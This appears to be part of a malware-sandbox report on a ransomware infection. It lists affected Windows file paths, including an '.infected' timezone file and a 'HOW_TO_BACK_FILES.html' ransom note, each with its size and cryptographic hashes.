1b8a4400db94f6c61c6052a2c875f71e

SHA1
23a087449bdaea4e7b2050dc954c34f0efe68a29

SHA256
88e57ae2951ab25699314a77b01a1780c547641fc585ae2536d04af560458f86

SHA512
91986352062e79a02b632611ffe02d9eda4574f743a314fca504a14404b2d8cc09c05f928936f060854515ea38cfa2f320bb9a1d8939ca7d96bb05aeef7cc9dc

Download Submit
C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\ECLIPSE_.RSA

Filesize
9KB

MD5
a727e69d21d3a4f6887fba45976ba053

SHA1
f53e22d0f5c0f9132f3656f58087087a9b1e98be

SHA256
aec37f2ec4330c22c7b71f182943a2eac9fdd5ac022595219e3f5a26e55de427

SHA512
c629d9363835a3993521d2d1ef3cce1c152cf22802d3fd1106175ab7c6ac5045a69be6ad66e8002d5441a83beffde1233530aa53743baacc991565b3c8962e96

Download Submit
C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-netbeans-api-visual.xml_hidden

Filesize
1KB

MD5
86e32b11cf78c9f711e68030bd5a2138

SHA1
f95ee4b23490b0ef6821951c98f02ce0e539fc82

SHA256
8c0fa675791d51bc8140ccb003b0909ef33f7223ab45e48acff560e14703058d

SHA512
e9be44b873e22f0195f7666424125beac0a9db9b5c634e2c36cb146497d62b2b10746e1d54774176efa122ced6e5caa96db7b71c3862484c95f80fecdf899ff4

Download Submit
C:\Program Files\Java\jre7\lib\images\cursors\win32_LinkNoDrop32x32.gif

Filesize
1KB

MD5
fe9962a00a620a0eff16eb9869d69c8f

SHA1
806d1d328b17228acd28987738f3c718ed307ef4

SHA256
a23cc977887c4c6faaa91817f8c4d71be71d7fda63041b3c820b78984c5f3c4c

SHA512
9af3778b891ac25708620a52fdf140e5d6a599eb9d434258eaf1a913490e92c3f797696c62e309142b6b47739a366b38c02a715a6c4fd4c60f86faadb17cbc6d

Download Submit
C:\Program Files\Java\jre7\lib\zi\Etc\UTC

Filesize
1KB

MD5
930e27a91befa2e786be817dfa614241

SHA1
9c22c3cf830dfc7f2c4b1da45e474e132f05b387

SHA256
c0f23f24d1d0a7a931d25b0edaa64f32183246c249c4098b62d0408df5d7cb5e

SHA512
f7a0ca11ca10b51bdfb678b49e4381444c9aa01a7b2f8e15f88131fcfe63fd4e8f7da02a494b22e563b475b354eb24fff6bcd7af555481bce06db95f338e75d6

Download Submit
C:\Program Files\Java\jre7\lib\zi\SystemV\EST5.infected

Filesize
1KB

MD5
a560fa2c3c4a3ed12264a80c3bf05b2e

SHA1
67de886f76e6cd8eb548f8cc7c9f945c6fda2530

SHA256
c890bef39a08441985ecf197346159a269e256b8a21c214e74a862f77ce1f4f1

SHA512
2ee0af6e0c43f2f1c0b0800c6c049d44ffbe28d435a52f2da3a19fd922e82ad6f71bb460dec0689c0914c0b4bcad20d51cc2e2cd5f04f34ddd134a4b1850d727

Download Submit
C:\Program Files\Java\jre7\lib\zi\SystemV\HST10

Filesize
1KB

MD5
7adc24fb29901a2e9a37afae8973bcb0

SHA1
1e29e7d6c788a85adfc93eac792403a0c05811da

SHA256
0ce6413a74318cbeed28d87a8833e3350a4408310d0eab1ffcb9f49b57400d9b

SHA512
293051aa6b0d5116f786c691b0d4b707f6c58a0e3db9fe113f08d8adf055c4b244f69b02f7bb5a4ff49b14f69d077cd99732caa1f0af3b4cd5e6e10b83cc953f

Download Submit
C:\Program Files\Java\jre7\lib\zi\SystemV\MST7

Filesize
1KB

MD5
7349d5484f765ce6e184bf19821be5d4

SHA1
9ad024750455f230a63ba99d8fadb0f4cb0d2be4

SHA256
2f991ce4fd4fb98ca235a89f1eed8113711c57c920a45f973fa350bc46ab8e15

SHA512
32fe9611f500f33f14c15a49db5768b93ea776f794680cc6e971ee6d1e4448a881b281d66d29bc9af035c719a1912dfa271c521289cfd5f492df0ecaf74dac06

Download Submit
C:\Program Files\VideoLAN\VLC\locale\eu\LC_MESSAGES\vlc.mo

Filesize
609KB

MD5
870b3a5cc25d13bd137c3deb1596298b

SHA1
9821d449ecae2ab7c4fc52784eb1e475c0f1685b

SHA256
112180f3d57d851aac2fb090600ffe1acc60b357a3e5006ffd7cfccaec20cf69

SHA512
1a8310f149211ef59c74c7fba7e9a001ab64f1215963e1b99025b74035916b6dc5ee8f9198e98f920cd3a2a3a2fcd5254cd54a2cdf1b37c3003375ddb8f65873

Download Submit
C:\ProgramData\Microsoft\Assistance\Client\1.0\es-ES\Help_MValidator.Lck

Filesize
1KB

MD5
93ecbab5a2523013fdb4819bcdd174f6

SHA1
596e3144038a5f6832ee587ba0da521563a265be

SHA256
a51aa0f6355d42834f0fe103fddeca1cfafe7f95d26907f374db22cba2b22691

SHA512
bafba19cb2d3034faa2614402c6767eb15b2ceb56b40673916b2cd8456d8c9c1f0e18853b3c88f1d124e02ca337dda4ae052ee9b00ac89d4b63c08823de03f47

Download Submit
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAB0002.002

Filesize
1KB

MD5
5a28212e9d4258ff3152b764489750ce

SHA1
47915e45ea83d799bedaef4a82b84b9786e807a3

SHA256
b8a6a46f2450fdf5507adcd8f824a6e48cb3572af6d4875e2d12dfbbf8e2a88a

SHA512
8d56b93a6d53e48d94daf09c94221627db5986673965ab29e0a0284cedcc3c55623f0fa1c221f4b6d1ed573cc049d745606df6f22b53574056b71acd87f52e5e

Download Submit
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\CiAD0001.000

Filesize
1KB

MD5
cc5ff589ad145ccc8c3a74a787c60063

SHA1
17871d6503985cffca80d59fd4307bc03b57a9cf

SHA256
2bf6af86a4035bf1c1449324b748220610f45b1a76d15c8fa361d31a819414a3

SHA512
96bfcf8cfd663e2e9ceb62d33bc689a64302745c48b11514e38c5c779129b87d9e7edfb1a933b43924b182adb36401f140eed16333102df22cc165191f2b99fc

Download Submit
C:\ProgramData\Package Cache\{662A0088-6FCD-45DD-9EA7-68674058AED5}v14.30.30704\packages\vcRuntimeMinimum_amd64\vc_runtimeMinimum_x64.msi

Filesize
181KB

MD5
f46eacdb9fbb810bb490a31b10e5e325

SHA1
3c7c76af6e921adb89de691f1fb3192451a28fd2

SHA256
bc631e69d3566247bc53628941f968b157ddb92ef975ead84f493e0d3952b1b8

SHA512
475285625dd583a40e163dcab5a7282681c7d9db675dbc8d95b8db2b53718845d6fb4f944d3decc9938550124c74156509370b5f2d4953ded4376ebe70cf3240

Download Submit
\Device\HarddiskVolume1\Boot\da-DK\HOW_TO_BACK_FILES.html

Filesize
3KB

MD5
a8514fd9f3a52ab2a00f57494d03b2fe

SHA1
0e204aabbd8b5d6ee1b36d10429d65eb436afd14

SHA256
056ae301d1686bbf2355fd96ef3363e2b18d593f58f912498d87de3569fa9028

SHA512
6250481712b51d19e13bf148e3cb046fbf669398b06f8ce757a8583a0fec36ca22140cb90d4706a731f27d1419795ff37ec079d170e15e9e2985020c1e6a1d5b

Download Submit